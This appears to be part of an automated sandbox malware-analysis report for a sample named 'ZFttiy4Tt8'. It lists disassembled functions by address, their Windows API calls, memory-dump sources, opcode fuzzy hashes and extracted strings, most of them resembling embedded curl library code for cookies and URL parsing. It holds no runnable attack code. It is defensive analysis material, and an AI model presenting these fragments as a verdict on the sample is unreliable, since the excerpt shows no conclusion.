                                                              • API String ID: 2781271927-0
                                                              • Opcode ID: 7ab298ed555d9642a985d400172be5e1a991d825dc2878515c67bc18898300ef
                                                              • Instruction ID: ece8356cc9622624485241af1054c59127efed5b1350031c7d5aad2f3be88de6
                                                              • Opcode Fuzzy Hash: 7ab298ed555d9642a985d400172be5e1a991d825dc2878515c67bc18898300ef
                                                              • Instruction Fuzzy Hash: 13D0C23470020097CA20AA14C884AAB733B7FC0714F29DB68E42C4A160C73BCC438601
                                                              Function 00E567E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ioctlsocket.WS2_32(?,8004667E,?,?,00E2AF56,?,00000001), ref: 00E567FC
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocket
                                                              • String ID:
                                                              • API String ID: 3577187118-0
                                                              • Opcode ID: 03acd2284b38e07e758f7ff7c5ff990d0e05f9703754bb4932fdbf2e60f45488
                                                              • Instruction ID: 5335767ea5ac199031c40fe1b5b74374b33508c8d32c8bbad6a2ae0802a3cfbb
                                                              • Opcode Fuzzy Hash: 03acd2284b38e07e758f7ff7c5ff990d0e05f9703754bb4932fdbf2e60f45488
                                                              • Instruction Fuzzy Hash: 59C012F1118101AFC6088B14D855A6F76D8DB85355F01581CB04A81180EA345994CA1A
                                                              Function 00DF31D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: a57ccf806f1a44bb291fb6a2a88e0df323152377d70229a2d4cbabb96cf8faf2
                                                              • Instruction ID: 9292735873265b3472a9a516c5e32a2f38167bc74fa98786acad8f5698f9e57d
                                                              • Opcode Fuzzy Hash: a57ccf806f1a44bb291fb6a2a88e0df323152377d70229a2d4cbabb96cf8faf2
                                                              • Instruction Fuzzy Hash: 2F31C6B49093159FDB00EFB8D5846AEBBF4BF44308F01886DD898A7300E7349A84CF52
                                                              Function 0117B180 Relevance: 1.3, APIs: 1, Instructions: 9sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 325a0ad6e21001750eaa0ab27a04ae71d3dfe20f87f5fdd5c73126c60e684e37
                                                              • Instruction ID: efc93b92a1e806d38a656ba736c5bb160e6983c17df2d9222673d27db018dc32
                                                              • Opcode Fuzzy Hash: 325a0ad6e21001750eaa0ab27a04ae71d3dfe20f87f5fdd5c73126c60e684e37
                                                              • Instruction Fuzzy Hash: E4C04CA0C1464446DB44BA38894651D79F57741104FC11A69998496299FA6893288667

                                                              Non-executed Functions

                                                              Function 00E31BE0 Relevance: 33.9, Strings: 26, Instructions: 1418COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                              • API String ID: 0-1371176463
                                                              • Opcode ID: daaf9c8238eaa0bbb4e06aa8e29f21f44cc908aa8ca99e198fb26da099dfcb50
                                                              • Instruction ID: 5f386838e4a830239312e789d3aa96c5fe0b1392c00f85be112c62431f8f2645
                                                              • Opcode Fuzzy Hash: daaf9c8238eaa0bbb4e06aa8e29f21f44cc908aa8ca99e198fb26da099dfcb50
                                                              • Instruction Fuzzy Hash: 7CB25870A08301ABE724AA24DC4AB66BFD4AF5431CF08553CEAC9B7382E775EC54D752
                                                              Function 00E04940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                              • API String ID: 0-122532811
                                                              • Opcode ID: 116c969af02a620678538a527cc878fab7377c3c773ff36712eb3f2e3940e629
                                                              • Instruction ID: d1b05df7ee67e2e7d18152aa32a81caf854a4ae4fcda2593423e7d85a5441e91
                                                              • Opcode Fuzzy Hash: 116c969af02a620678538a527cc878fab7377c3c773ff36712eb3f2e3940e629
                                                              • Instruction Fuzzy Hash: 3E4218B2B08701AFD718DE24CC41BABB6EAEFC4704F04992CF549973D1E775A9508B92
                                                              Function 00EA9880 Relevance: 15.2, Strings: 12, Instructions: 226COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: -vc$ans$ate$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                                              • API String ID: 0-1574211403
                                                              • Opcode ID: 7b7832e072cc1f40625f4ab426ec306621ece8d48f01deb1bed98a7bbe002ed6
                                                              • Instruction ID: 199bf52a04ed54f0f3b7c0eb66937b75bfe7a48de7617988bdfc88f7049d2bfe
                                                              • Opcode Fuzzy Hash: 7b7832e072cc1f40625f4ab426ec306621ece8d48f01deb1bed98a7bbe002ed6
                                                              • Instruction Fuzzy Hash: B9610CA5B0830167E714A620AC52B7B76D99BDA308F14643DFC4ABA393FE75FD048253
                                                              Function 00E14F70 Relevance: 12.2, Strings: 9, Instructions: 911COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                              • API String ID: 0-1914377741
                                                              • Opcode ID: 1b5d30a2250cf55dd7007f87f11804b70910888740af93be53d1f978757b628b
                                                              • Instruction ID: 8b22f918542ee552eab6236adda96744d3711b3236d9fa0d7f5342c6d3f5ae7e
                                                              • Opcode Fuzzy Hash: 1b5d30a2250cf55dd7007f87f11804b70910888740af93be53d1f978757b628b
                                                              • Instruction Fuzzy Hash: DD722932608B41DFE7358A28C5467E7B7D29FD1348F08A61CED856B292E776D8C4C782
                                                              Function 00EBEF90 Relevance: 9.4, Strings: 7, Instructions: 688COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $.$;$?$?$xn--$xn--
                                                              • API String ID: 0-543057197
                                                              • Opcode ID: 5e94bb0e852399c8b4900deb8cfcfd9b690edf1d566a61096a4d09037ca76da8
                                                              • Instruction ID: 25febeb5f8741b8536b51104b885dae956f9287e010de2a9a77f1743659880b6
                                                              • Opcode Fuzzy Hash: 5e94bb0e852399c8b4900deb8cfcfd9b690edf1d566a61096a4d09037ca76da8
                                                              • Instruction Fuzzy Hash: CA2207B2A043019BEB249A24DC41BAB77E5AFD434CF04553CF899B72A2EB35DD05C792
                                                              Function 00DFA960 Relevance: 9.0, Strings: 6, Instructions: 1493COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                              • API String ID: 0-2555271450
                                                              • Opcode ID: 2040e95e0dbb5572827a9278cfca3e933b7ce09a6931b8f07b24394f465e8572
                                                              • Instruction ID: 75d203c1a48e7afeb75d12e5d35174c6a242994a49b2d686a8991f4fd88df983
                                                              • Opcode Fuzzy Hash: 2040e95e0dbb5572827a9278cfca3e933b7ce09a6931b8f07b24394f465e8572
                                                              • Instruction Fuzzy Hash: 2CC28D716083498FC714CF28C49066AB7E2EFC9364F1AC92EE9D99B351D730ED458B92
                                                              Function 00DFE620 Relevance: 8.5, Strings: 6, Instructions: 1028COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                              • API String ID: 0-2555271450
                                                              • Opcode ID: b80f17e7e9698ef1dd09ef8e3da11758ba59082d77c30a4b2d83838215ccced9
                                                              • Instruction ID: 84a09e94fc4ecd2d787e58800254190a6b3a9e4c343f130ff99b98251cd0f42a
                                                              • Opcode Fuzzy Hash: b80f17e7e9698ef1dd09ef8e3da11758ba59082d77c30a4b2d83838215ccced9
                                                              • Instruction Fuzzy Hash: 1F827D71A083059FD714CF28C88472BB7E1AFD5724F19CA2DEAA9973A1D730DC458B62
                                                              Function 00E56210 Relevance: 7.9, Strings: 6, Instructions: 419COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
